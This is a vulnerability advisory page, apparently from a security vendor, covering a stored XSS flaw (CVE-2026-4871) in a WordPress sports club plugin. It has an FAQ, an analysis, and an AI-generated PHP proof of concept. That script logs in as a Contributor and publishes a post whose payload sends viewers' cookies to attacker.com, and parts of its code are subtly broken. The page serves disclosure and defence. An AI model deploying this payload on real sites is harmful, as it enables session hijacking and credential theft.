What is CVE-2026-4871?

CVE-2026-4871 is a stored cross-site scripting (XSS) vulnerability in the Sports Club Management plugin for WordPress, affecting versions up to 1.12.9. It allows authenticated users with Contributor-level access or higher to inject arbitrary scripts via the ‘before’ and ‘after’ attributes of the scm_member_data shortcode.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin. An attacker can use the scm_member_data shortcode with crafted attributes to inject malicious JavaScript, which executes in the browser of any user viewing the affected page.

Who is affected by this vulnerability?

Any WordPress site using the Sports Club Management plugin version 1.12.9 or earlier is affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

You can check if your site is vulnerable by reviewing the version of the Sports Club Management plugin installed. If it is version 1.12.9 or earlier, your site is at risk for CVE-2026-4871.

How can I fix this vulnerability?

To fix this vulnerability, update the Sports Club Management plugin to the latest version where the issue is resolved. Additionally, ensure that input sanitization and output escaping are implemented in the shortcode handling.

What does the CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity level. This means that while the vulnerability is not critical, it poses a significant risk if exploited, particularly since it allows for persistent script injection.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, credential theft, and defacement of the site. Malicious scripts can exfiltrate sensitive data from users, including cookies and authentication tokens.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an authenticated user can log into a WordPress site and use the scm_member_data shortcode with a malicious payload in the ‘before’ attribute. This demonstrates the ease of injecting scripts that execute when other users view the page.

Is there a way to mitigate this vulnerability without updating?

While the best mitigation is to update the plugin, you can also restrict access to the shortcode for users with Contributor-level permissions or lower. However, this does not fully resolve the issue and updating is strongly recommended.

What should I do if I cannot update the plugin immediately?

If you cannot update immediately, consider disabling the Sports Club Management plugin until a secure version is available. Monitor your site for any unusual activity and review user permissions to limit potential exploitation.

How can I ensure my WordPress site remains secure in the future?

Regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and conduct periodic security audits. Additionally, implement least privilege access controls for users to minimize potential attack vectors.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-4871: Sports Club Management <= 1.12.9 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'before' Attribute (sports-club-management)

CVE ID CVE-2026-4871

Plugin sports-club-management

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.12.9

Patched Version —

Disclosed April 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4871 (metadata-based): This vulnerability is a stored cross-site scripting (XSS) flaw in the Sports Club Management plugin for WordPress, affecting all versions up to and including 1.12.9. The issue exists in the `scm_member_data` shortcode’s ‘before’ and ‘after’ attributes, allowing authenticated attackers with Contributor-level access or higher to inject arbitrary web scripts. The CVSS score is 6.4 (Medium), with network attack vector, low complexity, and scope change.

Root Cause: Based on the CWE classification (79) and the vulnerability description, Atomic Edge analysis infers that the plugin’s `scm_member_data` shortcode does not properly sanitize or escape the ‘before’ and ‘after’ attributes before rendering HTML output. In WordPress, shortcode attributes are typically passed as strings; without adequate input sanitization (e.g., `wp_kses`, `sanitize_text_field`) and output escaping (e.g., `esc_attr`, `esc_html`), an attacker can inject malicious JavaScript or HTML. This conclusion is inferred from metadata; no code diff is available for confirmation.

Exploitation: An attacker with at least Contributor-level access can exploit this by embedding the `scm_member_data` shortcode in a post or page with a crafted ‘before’ or ‘after’ attribute. The attack vector uses the WordPress post editor (e.g., Classic Editor or Block Editor’s Custom HTML block). A typical payload for the ‘before’ attribute would be: `[scm_member_data before=”alert(‘XSS’)”]`. When any user (including administrators) views the affected post, the injected script executes in their browser. No AJAX or REST endpoint is needed; the attack occurs via standard post submission.

Remediation: The fix requires adding input sanitization and output escaping to the ‘before’ and ‘after’ attributes within the `scm_member_data` shortcode handler. Specifically, the plugin should apply `esc_attr()` to the attribute values when outputting them in HTML attributes, or sanitize them with `sanitize_text_field()` or `wp_kses_bad_protocol()` for more complex contexts. Developers should also consider using `wp_kses_allowed_html()` with an appropriate context to strip unsafe tags.

Impact: Successful exploitation allows attackers to inject persistent JavaScript that runs in the context of any user viewing the infected page. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. Sensitive data such as cookies, authentication tokens, and page content can be exfiltrated. The stored nature of the XSS means the payload remains active until manually removed, affecting all visitors, including administrators.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4871 - Sports Club Management <= 1.12.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'before' Attribute

<?php

// Configuration: Set the target WordPress site and login credentials
$target_url = 'http://example.com'; // Replace with the actual site URL
$username = 'contributor_user'; // Replace with Contributor-level username
$password = 'user_password'; // Replace with Contributor-level password

// Step 1: Login to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);

if (strpos($response, 'Dashboard') === false) {
    die('Login failed. Check credentials or site URL.');
}
echo "[+] Login successful.n";

// Step 2: Get a nonce for post creation
$admin_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

// Extract the wpnonce value (name='_wpnonce' or similar)
preg_match('/<input type="hidden" name="_wpnonce" value="([^"]+)"/>/i', $response, $matches);
if (empty($matches)) {
    // Alternative: look for wp_rest nonce or Classic Editor nonce
    preg_match('/<input type="hidden" name="_wpnonce" value="([^"]+)"/i', $response, $matches);
}
if (empty($matches)) {
    // Fallback: use quick draft AJAX nonce (not always reliable)
    preg_match('/"wpnonce":"([^"]+)"/i', $response, $matches);
}
$nonce = isset($matches[1]) ? $matches[1] : '';
if (empty($nonce)) {
    die('Failed to obtain nonce. Manual interaction may be needed.');
}
echo "[+] Nonce obtained: $noncen";

// Step 3: Create a new post with the malicious shortcode in the content
$post_url = $target_url . '/wp-admin/post.php';
$post_data = array(
    '_wpnonce' => $nonce,
    'action' => 'editpost',
    'post_type' => 'post',
    'post_title' => 'Atomic Edge XSS POC - CVE-2026-4871',
    'content' => '[scm_member_data before="<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>"]',
    'post_status' => 'publish',
    'original_post_status' => 'draft',
    'post_author' => 1, // Adjust based on the contributor user ID
    'user_ID' => 1,
    'post_date' => current_time('mysql'),
    'comment_status' => 'open',
    'ping_status' => 'open',
    'post_name' => '',
    'post_parent' => 0,
    'menu_order' => 0,
    'post_password' => '',
    'post_excerpt' => '',
    'tags_input' => '',
    'tax_input' => array('category' => array(1)),
    'metakeyinput' => '',
    'metakeyselect' => '#NONE#',
    'advanced_view' => 1,
    'wp-preview' => '',
    'hidden_post_status' => 'draft',
    'hidden_post_password' => '',
    'hidden_post_visibility' => 'public',
    'visibility' => 'public',
    'post_format' => 0,
    'sticky' => false,
    'publish' => 'Publish'
);

curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

if (strpos($response, 'Post published') !== false || strpos($response, 'message=6') !== false) {
    echo "[+] Post created successfully with malicious shortcode.n";
} else {
    echo "[!] Post creation may have failed or requires manual verification. Check the site.n";
}

curl_close($ch);
echo "[+] PoC completed. Visit the site to verify the XSS payload execution.n";

?>

Frequently Asked Questions

What is CVE-2026-4871?
Understanding the vulnerability
CVE-2026-4871 is a stored cross-site scripting (XSS) vulnerability in the Sports Club Management plugin for WordPress, affecting versions up to 1.12.9. It allows authenticated users with Contributor-level access or higher to inject arbitrary scripts via the ‘before’ and ‘after’ attributes of the scm_member_data shortcode.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin. An attacker can use the scm_member_data shortcode with crafted attributes to inject malicious JavaScript, which executes in the browser of any user viewing the affected page.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Sports Club Management plugin version 1.12.9 or earlier is affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Verifying plugin version
You can check if your site is vulnerable by reviewing the version of the Sports Club Management plugin installed. If it is version 1.12.9 or earlier, your site is at risk for CVE-2026-4871.
How can I fix this vulnerability?
Remediation steps
To fix this vulnerability, update the Sports Club Management plugin to the latest version where the issue is resolved. Additionally, ensure that input sanitization and output escaping are implemented in the shortcode handling.
What does the CVSS score of 6.4 indicate?
Understanding severity
A CVSS score of 6.4 indicates a medium severity level. This means that while the vulnerability is not critical, it poses a significant risk if exploited, particularly since it allows for persistent script injection.
What are the practical risks of this vulnerability?
Potential impacts on users
Exploitation of this vulnerability can lead to session hijacking, credential theft, and defacement of the site. Malicious scripts can exfiltrate sensitive data from users, including cookies and authentication tokens.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept shows how an authenticated user can log into a WordPress site and use the scm_member_data shortcode with a malicious payload in the ‘before’ attribute. This demonstrates the ease of injecting scripts that execute when other users view the page.
Is there a way to mitigate this vulnerability without updating?
Temporary workarounds
While the best mitigation is to update the plugin, you can also restrict access to the shortcode for users with Contributor-level permissions or lower. However, this does not fully resolve the issue and updating is strongly recommended.
What should I do if I cannot update the plugin immediately?
Interim measures
If you cannot update immediately, consider disabling the Sports Club Management plugin until a secure version is available. Monitor your site for any unusual activity and review user permissions to limit potential exploitation.
How can I ensure my WordPress site remains secure in the future?
Best practices for security
Regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and conduct periodic security audits. Additionally, implement least privilege access controls for users to minimize potential attack vectors.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations